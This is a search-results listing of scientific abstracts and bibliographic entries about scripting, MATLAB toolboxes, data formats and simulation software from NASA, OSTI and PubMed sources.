Tang, G.; Andre, B.; Hoffman, F. M.; Painter, S. L.; Thornton, P. E.; Yuan, F.; Bisht, G.; Hammond, G. E.; Lichtner, P. C.; Kumar, J.; Mills, R. T.; Xu, X.
2016-04-19
This Modeling Archive is in support of an NGEE Arctic discussion paper under review and available at doi:10.5194/gmd-9-927-2016. The purpose is to document the simulations to allow verification, reproducibility, and follow-up studies. This dataset contains shell scripts to create the CLM-PFLOTRAN cases, specific input files for PFLOTRAN and CLM, outputs, and python scripts to make the figures using the outputs in the publication. Through these results, we demonstrate that CLM-PFLOTRAN can approximately reproduce CLM results in selected cases for the Arctic, temperate and tropic sites. In addition, the new framework facilitates mechanistic representations of soil biogeochemistry processes in the land surface model.
NASA Astrophysics Data System (ADS)
Currie, Malcolm J.
This cookbook describes the fundamentals of writing scripts using the UNIX C shell. It shows how to combine Starlink and private applications with shell commands and constructs to create powerful and time-saving tools for performing repetitive jobs, creating data-processing pipelines, and encapsulating useful recipes. The cookbook aims to give practical and reassuring examples to at least get you started without having to consult a UNIX manual. However, it does not offer a comprehensive description of C-shell syntax to prevent you from being overwhelmed or intimidated. The topics covered are: how to run a script, defining shell variables, prompting, arithmetic and string processing, passing information between Starlink applications, obtaining dataset attributes and FITS header information, processing multiple files and filename modification, command-line arguments and options, and loops. There is also a glossary.
PISCES High Contrast Integral Field Spectrograph Simulations and Data Reduction Pipeline
NASA Technical Reports Server (NTRS)
Llop Sayson, Jorge Domingo; Memarsadeghi, Nargess; McElwain, Michael W.; Gong, Qian; Perrin, Marshall; Brandt, Timothy; Grammer, Bryan; Greeley, Bradford; Hilton, George; Marx, Catherine
2015-01-01
The PISCES (Prototype Imaging Spectrograph for Coronagraphic Exoplanet Studies) is a lenslet array based integral field spectrograph (IFS) designed to advance the technology readiness of the WFIRST (Wide Field Infrared Survey Telescope)-AFTA (Astrophysics Focused Telescope Assets) high contrast Coronagraph Instrument. We present the end to end optical simulator and plans for the data reduction pipeline (DRP). The optical simulator was created with a combination of the IDL (Interactive Data Language)-based PROPER (optical propagation) library and Zemax (a MatLab script), while the data reduction pipeline is a modified version of the Gemini Planet Imager's (GPI) IDL pipeline. The simulations of the propagation of light through the instrument are based on Fourier transform algorithms. The DRP enables transformation of the PISCES IFS data to calibrated spectral data cubes.
Adaptive smart simulator for characterization and MPPT construction of PV array
DOE Office of Scientific and Technical Information (OSTI.GOV)
Ouada, Mehdi, E-mail: mehdi.ouada@univ-annaba.org; Meridjet, Mohamed Salah; Dib, Djalel
2016-07-25
Partial shading conditions are among the most important problems in large photovoltaic array. Many works of literature are interested in modeling, control and optimization of photovoltaic conversion of solar energy under partial shading conditions, The aim of this study is to build a software simulator similar to hard simulator and to produce a shading pattern of the proposed photovoltaic array in order to use the delivered information to obtain an optimal configuration of the PV array and construct MPPT algorithm. Graphical user interfaces (Matlab GUI) are built using a developed script, this tool is easy to use, simple, and hasmore » a rapid of responsiveness, the simulator supports large array simulations that can be interfaced with MPPT and power electronic converters.« less
Computation of thermodynamic equilibrium in systems under stress
NASA Astrophysics Data System (ADS)
Vrijmoed, Johannes C.; Podladchikov, Yuri Y.
2016-04-01
Metamorphic reactions may be partly controlled by the local stress distribution as suggested by observations of phase assemblages around garnet inclusions related to an amphibolite shear zone in granulite of the Bergen Arcs in Norway. A particular example presented in fig. 14 of Mukai et al. [1] is discussed here. A garnet crystal embedded in a plagioclase matrix is replaced on the left side by a high pressure intergrowth of kyanite and quartz and on the right side by chlorite-amphibole. This texture apparently represents disequilibrium. In this case, the minerals adapt to the low pressure ambient conditions only where fluids were present. Alternatively, here we compute that this particular low pressure and high pressure assemblage around a stressed rigid inclusion such as garnet can coexist in equilibrium. To do the computations we developed the Thermolab software package. The core of the software package consists of Matlab functions that generate Gibbs energy of minerals and melts from the Holland and Powell database [2] and aqueous species from the SUPCRT92 database [3]. Most up to date solid solutions are included in a general formulation. The user provides a Matlab script to do the desired calculations using the core functions. Gibbs energy of all minerals, solutions and species are benchmarked versus THERMOCALC, PerpleX [4] and SUPCRT92 and are reproduced within round off computer error. Multi-component phase diagrams have been calculated using Gibbs minimization to benchmark with THERMOCALC and Perple_X. The Matlab script to compute equilibrium in a stressed system needs only two modifications of the standard phase diagram script. Firstly, Gibbs energy of phases considered in the calculation is generated for multiple values of thermodynamic pressure. Secondly, for the Gibbs minimization the proportion of the system at each particular thermodynamic pressure needs to be constrained. The user decides which part of the stress tensor is input as thermodynamic pressure. To compute a case of high and low pressure around a stressed inclusion we first did a Finite Element Method calculation of a rigid inclusion in a viscous matrix under simple shear. From the computed stress distribution we took the local pressure (mean stress) in each grid point of the FEM calculation. This was used as input thermodynamic pressure in the Gibbs minimization and the result showed it is possible to have an equilibrium situation in which chlorite-amphibole is stable in the low pressure domain and kyanite in the high pressure domain of the stress field around the inclusion. Interestingly, the calculation predicts the redistribution of fluid from an average content of fluid in the system. The fluid in equilibrium tends to accumulate in the low pressure areas whereas it leaves the high pressure areas dry. Transport of fluid components occurs not necessarily by fluid flow, but may happen for example by diffusion. We conclude that an apparent disequilibrium texture may be explained by equilibrium under pressure variations, and apparent fluid addition by redistribution of fluid controlled by the local stress distribution. [1] Mukai et al. (2014), Journal of Petrology, 55 (8), p. 1457-1477. [2] Holland and Powell (1998), Journal of Metamorphic Geology, 16, p. 309-343 [3] Johnson et al. (1992), Computers & Geosciences, 18 (7), p. 899-947 [4] Connolly (2005), Earth and Planetary Science Letters, 236, p. 524-541
Technical development of PubMed interact: an improved interface for MEDLINE/PubMed searches.
Muin, Michael; Fontelo, Paul
2006-11-03
The project aims to create an alternative search interface for MEDLINE/PubMed that may provide assistance to the novice user and added convenience to the advanced user. An earlier version of the project was the 'Slider Interface for MEDLINE/PubMed searches' (SLIM) which provided JavaScript slider bars to control search parameters. In this new version, recent developments in Web-based technologies were implemented. These changes may prove to be even more valuable in enhancing user interactivity through client-side manipulation and management of results. PubMed Interact is a Web-based MEDLINE/PubMed search application built with HTML, JavaScript and PHP. It is implemented on a Windows Server 2003 with Apache 2.0.52, PHP 4.4.1 and MySQL 4.1.18. PHP scripts provide the backend engine that connects with E-Utilities and parses XML files. JavaScript manages client-side functionalities and converts Web pages into interactive platforms using dynamic HTML (DHTML), Document Object Model (DOM) tree manipulation and Ajax methods. With PubMed Interact, users can limit searches with JavaScript slider bars, preview result counts, delete citations from the list, display and add related articles and create relevance lists. Many interactive features occur at client-side, which allow instant feedback without reloading or refreshing the page resulting in a more efficient user experience. PubMed Interact is a highly interactive Web-based search application for MEDLINE/PubMed that explores recent trends in Web technologies like DOM tree manipulation and Ajax. It may become a valuable technical development for online medical search applications.
2014-01-01
Background Various computer-based methods exist for the detection and quantification of protein spots in two dimensional gel electrophoresis images. Area-based methods are commonly used for spot quantification: an area is assigned to each spot and the sum of the pixel intensities in that area, the so-called volume, is used a measure for spot signal. Other methods use the optical density, i.e. the intensity of the most intense pixel of a spot, or calculate the volume from the parameters of a fitted function. Results In this study we compare the performance of different spot quantification methods using synthetic and real data. We propose a ready-to-use algorithm for spot detection and quantification that uses fitting of two dimensional Gaussian function curves for the extraction of data from two dimensional gel electrophoresis (2-DE) images. The algorithm implements fitting using logical compounds and is computationally efficient. The applicability of the compound fitting algorithm was evaluated for various simulated data and compared with other quantification approaches. We provide evidence that even if an incorrect bell-shaped function is used, the fitting method is superior to other approaches, especially when spots overlap. Finally, we validated the method with experimental data of urea-based 2-DE of Aβ peptides andre-analyzed published data sets. Our methods showed higher precision and accuracy than other approaches when applied to exposure time series and standard gels. Conclusion Compound fitting as a quantification method for 2-DE spots shows several advantages over other approaches and could be combined with various spot detection methods. The algorithm was scripted in MATLAB (Mathworks) and is available as a supplemental file. PMID:24915860
Simulation Modeling and Performance Evaluation of Space Networks
NASA Technical Reports Server (NTRS)
Jennings, Esther H.; Segui, John
2006-01-01
In space exploration missions, the coordinated use of spacecraft as communication relays increases the efficiency of the endeavors. To conduct trade-off studies of the performance and resource usage of different communication protocols and network designs, JPL designed a comprehensive extendable tool, the Multi-mission Advanced Communications Hybrid Environment for Test and Evaluation (MACHETE). The design and development of MACHETE began in 2000 and is constantly evolving. Currently, MACHETE contains Consultative Committee for Space Data Systems (CCSDS) protocol standards such as Proximity-1, Advanced Orbiting Systems (AOS), Packet Telemetry/Telecommand, Space Communications Protocol Specification (SCPS), and the CCSDS File Delivery Protocol (CFDP). MACHETE uses the Aerospace Corporation s Satellite Orbital Analysis Program (SOAP) to generate the orbital geometry information and contact opportunities. Matlab scripts provide the link characteristics. At the core of MACHETE is a discrete event simulator, QualNet. Delay Tolerant Networking (DTN) is an end-to-end architecture providing communication in and/or through highly stressed networking environments. Stressed networking environments include those with intermittent connectivity, large and/or variable delays, and high bit error rates. To provide its services, the DTN protocols reside at the application layer of the constituent internets, forming a store-and-forward overlay network. The key capabilities of the bundling protocols include custody-based reliability, ability to cope with intermittent connectivity, ability to take advantage of scheduled and opportunistic connectivity, and late binding of names to addresses. In this presentation, we report on the addition of MACHETE models needed to support DTN, namely: the Bundle Protocol (BP) model. To illustrate the use of MACHETE with the additional DTN model, we provide an example simulation to benchmark its performance. We demonstrate the use of the DTN protocol and discuss statistics gathered concerning the total time needed to simulate numerous bundle transmissions
Homaeinezhad, M R; Sabetian, P; Feizollahi, A; Ghaffari, A; Rahmani, R
2012-02-01
The major focus of this study is to present a performance accuracy assessment framework based on mathematical modelling of cardiac system multiple measurement signals. Three mathematical algebraic subroutines with simple structural functions for synthetic generation of the synchronously triggered electrocardiogram (ECG), phonocardiogram (PCG) and arterial blood pressure (ABP) signals are described. In the case of ECG signals, normal and abnormal PQRST cycles in complicated conditions such as fascicular ventricular tachycardia, rate dependent conduction block and acute Q-wave infarctions of inferior and anterolateral walls can be simulated. Also, continuous ABP waveform with corresponding individual events such as systolic, diastolic and dicrotic pressures with normal or abnormal morphologies can be generated by another part of the model. In addition, the mathematical synthetic PCG framework is able to generate the S4-S1-S2-S3 cycles in normal and in cardiac disorder conditions such as stenosis, insufficiency, regurgitation and gallop. In the PCG model, the amplitude and frequency content (5-700 Hz) of each sound and variation patterns can be specified. The three proposed models were implemented to generate artificial signals with varies abnormality types and signal-to-noise ratios (SNR), for quantitative detection-delineation performance assessment of several ECG, PCG and ABP individual event detectors designed based on the Hilbert transform, discrete wavelet transform, geometric features such as area curve length (ACLM), the multiple higher order moments (MHOM) metric, and the principal components analysed geometric index (PCAGI). For each method the detection-delineation operating characteristics were obtained automatically in terms of sensitivity, positive predictivity and delineation (segmentation) error rms and checked by the cardiologist. The Matlab m-file script of the synthetic ECG, ABP and PCG signal generators are available in the Appendix.
2014-04-25
EA’s Java application programming interface (API), the team built a tool called OWL2EA that can ingest an OWL file and generate the corresponding UML...ObjectItemStructure specification shown in Figure 10. Running this script in the relational database server MySQL creates the physical schema that
Visualization of Wind Data on Google Earth for the Three-dimensional Wind Field (3DWF) Model
2012-09-01
ActiveX components or XPCOM extensions can be used by JavaScript to write data to the local file system. Since there is an inherent risk, it is very...important to only use these types of objects ( ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware
Graphical User Interface for Simulink Integrated Performance Analysis Model
NASA Technical Reports Server (NTRS)
Durham, R. Caitlyn
2009-01-01
The J-2X Engine (built by Pratt & Whitney Rocketdyne,) in the Upper Stage of the Ares I Crew Launch Vehicle, will only start within a certain range of temperature and pressure for Liquid Hydrogen and Liquid Oxygen propellants. The purpose of the Simulink Integrated Performance Analysis Model is to verify that in all reasonable conditions the temperature and pressure of the propellants are within the required J-2X engine start boxes. In order to run the simulation, test variables must be entered at all reasonable values of parameters such as heat leak and mass flow rate. To make this testing process as efficient as possible in order to save the maximum amount of time and money, and to show that the J-2X engine will start when it is required to do so, a graphical user interface (GUI) was created to allow the input of values to be used as parameters in the Simulink Model, without opening or altering the contents of the model. The GUI must allow for test data to come from Microsoft Excel files, allow those values to be edited before testing, place those values into the Simulink Model, and get the output from the Simulink Model. The GUI was built using MATLAB, and will run the Simulink simulation when the Simulate option is activated. After running the simulation, the GUI will construct a new Microsoft Excel file, as well as a MATLAB matrix file, using the output values for each test of the simulation so that they may graphed and compared to other values.
DOE Office of Scientific and Technical Information (OSTI.GOV)
DiCostanzo, D; Ayan, A; Woollard, J
Purpose: To automate the daily verification of each patient’s treatment by utilizing the trajectory log files (TLs) written by the Varian TrueBeam linear accelerator while reducing the number of false positives including jaw and gantry positioning errors, that are displayed in the Treatment History tab of Varian’s Chart QA module. Methods: Small deviations in treatment parameters are difficult to detect in weekly chart checks, but may be significant in reducing delivery errors, and would be critical if detected daily. Software was developed in house to read TLs. Multiple functions were implemented within the software that allow it to operate viamore » a GUI to analyze TLs, or as a script to run on a regular basis. In order to determine tolerance levels for the scripted analysis, 15,241 TLs from seven TrueBeams were analyzed. The maximum error of each axis for each TL was written to a CSV file and statistically analyzed to determine the tolerance for each axis accessible in the TLs to flag for manual review. The software/scripts developed were tested by varying the tolerance values to ensure veracity. After tolerances were determined, multiple weeks of manual chart checks were performed simultaneously with the automated analysis to ensure validity. Results: The tolerance values for the major axis were determined to be, 0.025 degrees for the collimator, 1.0 degree for the gantry, 0.002cm for the y-jaws, 0.01cm for the x-jaws, and 0.5MU for the MU. The automated verification of treatment parameters has been in clinical use for 4 months. During that time, no errors in machine delivery of the patient treatments were found. Conclusion: The process detailed here is a viable and effective alternative to manually checking treatment parameters during weekly chart checks.« less
NASA Technical Reports Server (NTRS)
Carpenter, James R.; Berry, Kevin; Gregpru. Late; Speckman, Keith; Hur-Diaz, Sun; Surka, Derek; Gaylor, Dave
2010-01-01
The Orbit Determination Toolbox is an orbit determination (OD) analysis tool based on MATLAB and Java that provides a flexible way to do early mission analysis. The toolbox is primarily intended for advanced mission analysis such as might be performed in concept exploration, proposal, early design phase, or rapid design center environments. The emphasis is on flexibility, but it has enough fidelity to produce credible results. Insight into all flight dynamics source code is provided. MATLAB is the primary user interface and is used for piecing together measurement and dynamic models. The Java Astrodynamics Toolbox is used as an engine for things that might be slow or inefficient in MATLAB, such as high-fidelity trajectory propagation, lunar and planetary ephemeris look-ups, precession, nutation, polar motion calculations, ephemeris file parsing, and the like. The primary analysis functions are sequential filter/smoother and batch least-squares commands that incorporate Monte-Carlo data simulation, linear covariance analysis, measurement processing, and plotting capabilities at the generic level. These functions have a user interface that is based on that of the MATLAB ODE suite. To perform a specific analysis, users write MATLAB functions that implement truth and design system models. The user provides his or her models as inputs to the filter commands. The software provides a capability to publish and subscribe to a software bus that is compliant with the NASA Goddard Mission Services Evolution Center (GMSEC) standards, to exchange data with other flight dynamics tools to simplify the flight dynamics design cycle. Using the publish and subscribe approach allows for analysts in a rapid design center environment to seamlessly incorporate changes in spacecraft and mission design into navigation analysis and vice versa.
ISMRM Raw data format: A proposed standard for MRI raw datasets.
Inati, Souheil J; Naegele, Joseph D; Zwart, Nicholas R; Roopchansingh, Vinai; Lizak, Martin J; Hansen, David C; Liu, Chia-Ying; Atkinson, David; Kellman, Peter; Kozerke, Sebastian; Xue, Hui; Campbell-Washburn, Adrienne E; Sørensen, Thomas S; Hansen, Michael S
2017-01-01
This work proposes the ISMRM Raw Data format as a common MR raw data format, which promotes algorithm and data sharing. A file format consisting of a flexible header and tagged frames of k-space data was designed. Application Programming Interfaces were implemented in C/C++, MATLAB, and Python. Converters for Bruker, General Electric, Philips, and Siemens proprietary file formats were implemented in C++. Raw data were collected using magnetic resonance imaging scanners from four vendors, converted to ISMRM Raw Data format, and reconstructed using software implemented in three programming languages (C++, MATLAB, Python). Images were obtained by reconstructing the raw data from all vendors. The source code, raw data, and images comprising this work are shared online, serving as an example of an image reconstruction project following a paradigm of reproducible research. The proposed raw data format solves a practical problem for the magnetic resonance imaging community. It may serve as a foundation for reproducible research and collaborations. The ISMRM Raw Data format is a completely open and community-driven format, and the scientific community is invited (including commercial vendors) to participate either as users or developers. Magn Reson Med 77:411-421, 2017. © 2016 Wiley Periodicals, Inc. © 2016 Wiley Periodicals, Inc.
MEA-Tools: an open source toolbox for the analysis of multi-electrode data with MATLAB.
Egert, U; Knott, Th; Schwarz, C; Nawrot, M; Brandt, A; Rotter, S; Diesmann, M
2002-05-30
Recent advances in electrophysiological techniques have created new tools for the acquisition and storage of neuronal activity recorded simultaneously with numerous electrodes. These techniques support the analysis of the function as well as the structure of individual electrogenic cells in the context of surrounding neuronal or cardiac network. Commercially available tools for the analysis of such data, however, cannot be easily adapted to newly emerging requirements for data analysis and visualization, and cross compatibility between them is limited. In this report we introduce a free open source toolbox called microelectrode array tools (MEA-Tools) for the analysis of multi-electrode data based on the common data analysis environment MATLAB (version 5.3-6.1, The Mathworks, Natick, MA). The toolbox itself is platform independent. The file interface currently supports files recorded with MCRack (Multi Channel Systems, Reutlingen, Germany) under Microsoft Windows 95, 98, NT, and 2000, but can be adapted to other data acquisition systems. Functions are controlled via command line input and graphical user interfaces, and support common requirements for the analysis of local field potentials, extracellular spike activity, and continuous recordings, in addition to supplementary data acquired by additional instruments, e.g. intracellular amplifiers. Data may be processed as continuous recordings or time windows triggered to some event.
Design Automation Using Script Languages. High-Level CAD Templates in Non-Parametric Programs
NASA Astrophysics Data System (ADS)
Moreno, R.; Bazán, A. M.
2017-10-01
The main purpose of this work is to study the advantages offered by the application of traditional techniques of technical drawing in processes for automation of the design, with non-parametric CAD programs, provided with scripting languages. Given that an example drawing can be solved with traditional step-by-step detailed procedures, is possible to do the same with CAD applications and to generalize it later, incorporating references. In today’s modern CAD applications, there are striking absences of solutions for building engineering: oblique projections (military and cavalier), 3D modelling of complex stairs, roofs, furniture, and so on. The use of geometric references (using variables in script languages) and their incorporation into high-level CAD templates allows the automation of processes. Instead of repeatedly creating similar designs or modifying their data, users should be able to use these templates to generate future variations of the same design. This paper presents the automation process of several complex drawing examples based on CAD script files aided with parametric geometry calculation tools. The proposed method allows us to solve complex geometry designs not currently incorporated in the current CAD applications and to subsequently create other new derivatives without user intervention. Automation in the generation of complex designs not only saves time but also increases the quality of the presentations and reduces the possibility of human errors.
NASA Technical Reports Server (NTRS)
Pototzky, Anthony S.
2010-01-01
A methodology is described for generating first-order plant equations of motion for aeroelastic and aeroservoelastic applications. The description begins with the process of generating data files representing specialized mode-shapes, such as rigid-body and control surface modes, using both PATRAN and NASTRAN analysis. NASTRAN executes the 146 solution sequence using numerous Direct Matrix Abstraction Program (DMAP) calls to import the mode-shape files and to perform the aeroelastic response analysis. The aeroelastic response analysis calculates and extracts structural frequencies, generalized masses, frequency-dependent generalized aerodynamic force (GAF) coefficients, sensor deflections and load coefficients data as text-formatted data files. The data files are then re-sequenced and re-formatted using a custom written FORTRAN program. The text-formatted data files are stored and coefficients for s-plane equations are fitted to the frequency-dependent GAF coefficients using two Interactions of Structures, Aerodynamics and Controls (ISAC) programs. With tabular files from stored data created by ISAC, MATLAB generates the first-order aeroservoelastic plant equations of motion. These equations include control-surface actuator, turbulence, sensor and load modeling. Altitude varying root-locus plot and PSD plot results for a model of the F-18 aircraft are presented to demonstrate the capability.
INSPIRE and SPIRES Log File Analysis
DOE Office of Scientific and Technical Information (OSTI.GOV)
Adams, Cole; /Wheaton Coll. /SLAC
2012-08-31
SPIRES, an aging high-energy physics publication data base, is in the process of being replaced by INSPIRE. In order to ease the transition from SPIRES to INSPIRE it is important to understand user behavior and the drivers for adoption. The goal of this project was to address some questions in regards to the presumed two-thirds of the users still using SPIRES. These questions are answered through analysis of the log files from both websites. A series of scripts were developed to collect and interpret the data contained in the log files. The common search patterns and usage comparisons are mademore » between INSPIRE and SPIRES, and a method for detecting user frustration is presented. The analysis reveals a more even split than originally thought as well as the expected trend of user transition to INSPIRE.« less
PDB explorer -- a web based algorithm for protein annotation viewer and 3D visualization.
Nayarisseri, Anuraj; Shardiwal, Rakesh Kumar; Yadav, Mukesh; Kanungo, Neha; Singh, Pooja; Shah, Pratik; Ahmed, Sheaza
2014-12-01
The PDB file format, is a text format characterizing the three dimensional structures of macro molecules available in the Protein Data Bank (PDB). Determined protein structure are found in coalition with other molecules or ions such as nucleic acids, water, ions, Drug molecules and so on, which therefore can be described in the PDB format and have been deposited in PDB database. PDB is a machine generated file, it's not human readable format, to read this file we need any computational tool to understand it. The objective of our present study is to develop a free online software for retrieval, visualization and reading of annotation of a protein 3D structure which is available in PDB database. Main aim is to create PDB file in human readable format, i.e., the information in PDB file is converted in readable sentences. It displays all possible information from a PDB file including 3D structure of that file. Programming languages and scripting languages like Perl, CSS, Javascript, Ajax, and HTML have been used for the development of PDB Explorer. The PDB Explorer directly parses the PDB file, calling methods for parsed element secondary structure element, atoms, coordinates etc. PDB Explorer is freely available at http://www.pdbexplorer.eminentbio.com/home with no requirement of log-in.
Rodríguez, J; Premier, G C; Dinsdale, R; Guwy, A J
2009-01-01
Mathematical modelling in environmental biotechnology has been a traditionally difficult resource to access for researchers and students without programming expertise. The great degree of flexibility required from model implementation platforms to be suitable for research applications restricts their use to programming expert users. More user friendly software packages however do not normally incorporate the necessary flexibility for most research applications. This work presents a methodology based on Excel and Matlab-Simulink for both flexible and accessible implementation of mathematical models by researchers with and without programming expertise. The models are almost fully defined in an Excel file in which the names and values of the state variables and parameters are easily created. This information is automatically processed in Matlab to create the model structure and almost immediate model simulation, after only a minimum Matlab code definition, is possible. The framework proposed also provides programming expert researchers with a highly flexible and modifiable platform on which to base more complex model implementations. The method takes advantage of structural generalities in most mathematical models of environmental bioprocesses while enabling the integration of advanced elements (e.g. heuristic functions, correlations). The methodology has already been successfully used in a number of research studies.
NASA Astrophysics Data System (ADS)
Lea, J.
2017-12-01
The quantification of glacier change is a key variable within glacier monitoring, with the method used potentially being crucial to ensuring that data can be appropriately compared with environmental data. The topic and timescales of study (e.g. land/marine terminating environments; sub-annual/decadal/centennial/millennial timescales) often mean that different methods are more suitable for different problems. However, depending on the GIS/coding expertise of the user, some methods can potentially be time consuming to undertake, making large-scale studies problematic. In addition, examples exist where different users have nominally applied the same methods in different studies, though with minor methodological inconsistencies in their approach. In turn, this will have implications for data homogeneity where regional/global datasets may be constructed. Here, I present a simple toolbox scripted in a Matlab® environment that requires only glacier margin and glacier centreline data to quantify glacier length, glacier change between observations, rate of change, in addition to other metrics. The toolbox includes the option to apply the established centreline or curvilinear box methods, or a new method: the variable box method - designed for tidewater margins where box width is defined as the total width of the individual terminus observation. The toolbox is extremely flexible, and has the option to be applied as either Matlab® functions within user scripts, or via a graphical user interface (GUI) for those unfamiliar with a coding environment. In both instances, there is potential to apply the methods quickly to large datasets (100s-1000s of glaciers, with potentially similar numbers of observations each), thus ensuring large scale methodological consistency (and therefore data homogeneity) and allowing regional/global scale analyses to be achievable for those with limited GIS/coding experience. The toolbox has been evaluated against idealised scenarios demonstrating its accuracy, while feedback from undergraduate students who have trialled the toolbox is that it is intuitive and simple to use. When released, the toolbox will be free and open source allowing users to potentially modify, improve and expand upon the current version.
A Survey of Complex Object Technologies for Digital Libraries
NASA Technical Reports Server (NTRS)
Nelson, Michael L.; Argue, Brad; Efron, Miles; Denn, Sheila; Pattuelli, Maria Cristina
2001-01-01
Many early web-based digital libraries (DLs) had implicit assumptions reflected in their architecture that the unit of focus in the DL (frequently "reports" or "e-prints") would only be manifested in a single, or at most a few, common file formats such as PDF or PostScript. DLs have now matured to the point where their contents are commonly no longer simple files. Complex objects in DLs have emerged from in response to various requirements, including: simple aggregation of formats and supporting files, bundling additional information to aid digital preservation, creating opaque digital objects for e-commerce applications, and the incorporation of dynamic services with the traditional data files. We examine a representative (but not necessarily exhaustive) number of current and recent historical web-based complex object technologies and projects that are applicable to DLs: Aurora, Buckets, ComMentor, Cryptolopes, Digibox, Document Management Alliance, FEDORA, Kahn-Wilensky Framework Digital Objects, Metadata Encoding & Transmission Standard, Multivalent Documents, Open eBooks, VERS Encapsulated Objects, and the Warwick Framework.
A cascading failure analysis tool for post processing TRANSCARE simulations
DOE Office of Scientific and Technical Information (OSTI.GOV)
This is a MATLAB-based tool to post process simulation results in the EPRI software TRANSCARE, for massive cascading failure analysis following severe disturbances. There are a few key modules available in this tool, including: 1. automatically creating a contingency list to run TRANSCARE simulations, including substation outages above a certain kV threshold, N-k (1, 2 or 3) generator outages and branche outages; 2. read in and analyze a CKO file of PCG definition, an initiating event list, and a CDN file; 3. post process all the simulation results saved in a CDN file and perform critical event corridor analysis; 4.more » provide a summary of TRANSCARE simulations; 5. Identify the most frequently occurring event corridors in the system; and 6. Rank the contingencies using a user defined security index to quantify consequences in terms of total load loss, total number of cascades, etc.« less
GEO2D - Two-Dimensional Computer Model of a Ground Source Heat Pump System
James Menart
2013-06-07
This file contains a zipped file that contains many files required to run GEO2D. GEO2D is a computer code for simulating ground source heat pump (GSHP) systems in two-dimensions. GEO2D performs a detailed finite difference simulation of the heat transfer occurring within the working fluid, the tube wall, the grout, and the ground. Both horizontal and vertical wells can be simulated with this program, but it should be noted that the vertical wall is modeled as a single tube. This program also models the heat pump in conjunction with the heat transfer occurring. GEO2D simulates the heat pump and ground loop as a system. Many results are produced by GEO2D as a function of time and position, such as heat transfer rates, temperatures and heat pump performance. On top of this information from an economic comparison between the geothermal system simulated and a comparable air heat pump systems or a comparable gas, oil or propane heating systems with a vapor compression air conditioner. The version of GEO2D in the attached file has been coupled to the DOE heating and cooling load software called ENERGYPLUS. This is a great convenience for the user because heating and cooling loads are an input to GEO2D. GEO2D is a user friendly program that uses a graphical user interface for inputs and outputs. These make entering data simple and they produce many plotted results that are easy to understand. In order to run GEO2D access to MATLAB is required. If this program is not available on your computer you can download the program MCRInstaller.exe, the 64 bit version, from the MATLAB website or from this geothermal depository. This is a free download which will enable you to run GEO2D..
Visual Data Analysis for Satellites
NASA Technical Reports Server (NTRS)
Lau, Yee; Bhate, Sachin; Fitzpatrick, Patrick
2008-01-01
The Visual Data Analysis Package is a collection of programs and scripts that facilitate visual analysis of data available from NASA and NOAA satellites, as well as dropsonde, buoy, and conventional in-situ observations. The package features utilities for data extraction, data quality control, statistical analysis, and data visualization. The Hierarchical Data Format (HDF) satellite data extraction routines from NASA's Jet Propulsion Laboratory were customized for specific spatial coverage and file input/output. Statistical analysis includes the calculation of the relative error, the absolute error, and the root mean square error. Other capabilities include curve fitting through the data points to fill in missing data points between satellite passes or where clouds obscure satellite data. For data visualization, the software provides customizable Generic Mapping Tool (GMT) scripts to generate difference maps, scatter plots, line plots, vector plots, histograms, timeseries, and color fill images.
Provenance Datasets Highlighting Capture Disparities
2014-01-01
Vistrails [20], Taverna [21] or Kepler [6], and an OS -observing system like PASS [18]. In less granular workflow systems, the data files, scripts...run, etc. are capturable as long as they are executed within the workflow system. In more granular OS -observing systems, the actual reads, writes...rolling up” very granular information to less granular information. OS -level capture knows that a socket was opened and that data was sent to a foreign
The IATH ELAN Text-Sync Tool: A Simple System for Mobilizing ELAN Transcripts On- or Off-Line
ERIC Educational Resources Information Center
Dobrin, Lise M.; Ross, Douglas
2017-01-01
In this article we present the IATH ELAN Text-Sync Tool (ETST; see http://community.village.virginia.edu/etst), a series of scripts and workflow for playing ELAN files and associated audiovisual media in a web browser either on- or off-line. ELAN has become an indispensable part of documentary linguists' toolkit, but it is less than ideal for…
Advanced Visualization and Interactive Displays (AVID)
2009-04-01
decision maker. The ACESViewer architecture allows the users to pull data from databases, flat files, or user generated via scripting. The...of the equation and is of critical concern as it scales the needs of the polygon fill operations. Numerous users are now using two 30” cinema ...6 module configuration. Based on the architecture of the lab there was only one location that would be suitable without any viewing obstructions
Technical development of PubMed Interact: an improved interface for MEDLINE/PubMed searches
Muin, Michael; Fontelo, Paul
2006-01-01
Background The project aims to create an alternative search interface for MEDLINE/PubMed that may provide assistance to the novice user and added convenience to the advanced user. An earlier version of the project was the 'Slider Interface for MEDLINE/PubMed searches' (SLIM) which provided JavaScript slider bars to control search parameters. In this new version, recent developments in Web-based technologies were implemented. These changes may prove to be even more valuable in enhancing user interactivity through client-side manipulation and management of results. Results PubMed Interact is a Web-based MEDLINE/PubMed search application built with HTML, JavaScript and PHP. It is implemented on a Windows Server 2003 with Apache 2.0.52, PHP 4.4.1 and MySQL 4.1.18. PHP scripts provide the backend engine that connects with E-Utilities and parses XML files. JavaScript manages client-side functionalities and converts Web pages into interactive platforms using dynamic HTML (DHTML), Document Object Model (DOM) tree manipulation and Ajax methods. With PubMed Interact, users can limit searches with JavaScript slider bars, preview result counts, delete citations from the list, display and add related articles and create relevance lists. Many interactive features occur at client-side, which allow instant feedback without reloading or refreshing the page resulting in a more efficient user experience. Conclusion PubMed Interact is a highly interactive Web-based search application for MEDLINE/PubMed that explores recent trends in Web technologies like DOM tree manipulation and Ajax. It may become a valuable technical development for online medical search applications. PMID:17083729
Hamilton, Ryan; Tamminana, Krishna; Boyd, John; Sasaki, Gen; Toda, Alex; Haskell, Sid; Danbe, Elizabeth
2013-04-01
We present a software platform developed by Genentech and MathWorks Consulting Group that allows arbitrary MATLAB (MATLAB is a registered trademark of The MathWorks, Inc.) functions to perform supervisory control of process equipment (in this case, fermentors) via the OLE for process control (OPC) communication protocol, under the direction of an industrial automation layer. The software features automated synchronization and deployment of server control code and has been proven to be tolerant of OPC communication interruptions. Since deployment in the spring of 2010, this software has successfully performed supervisory control of more than 700 microbial fermentations in the Genentech pilot plant and has enabled significant reductions in the time required to develop and implement novel control strategies (months reduced to days). The software is available for download at the MathWorks File Exchange Web site at http://www.mathworks.com/matlabcentral/fileexchange/36866.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Not Available
2011-06-22
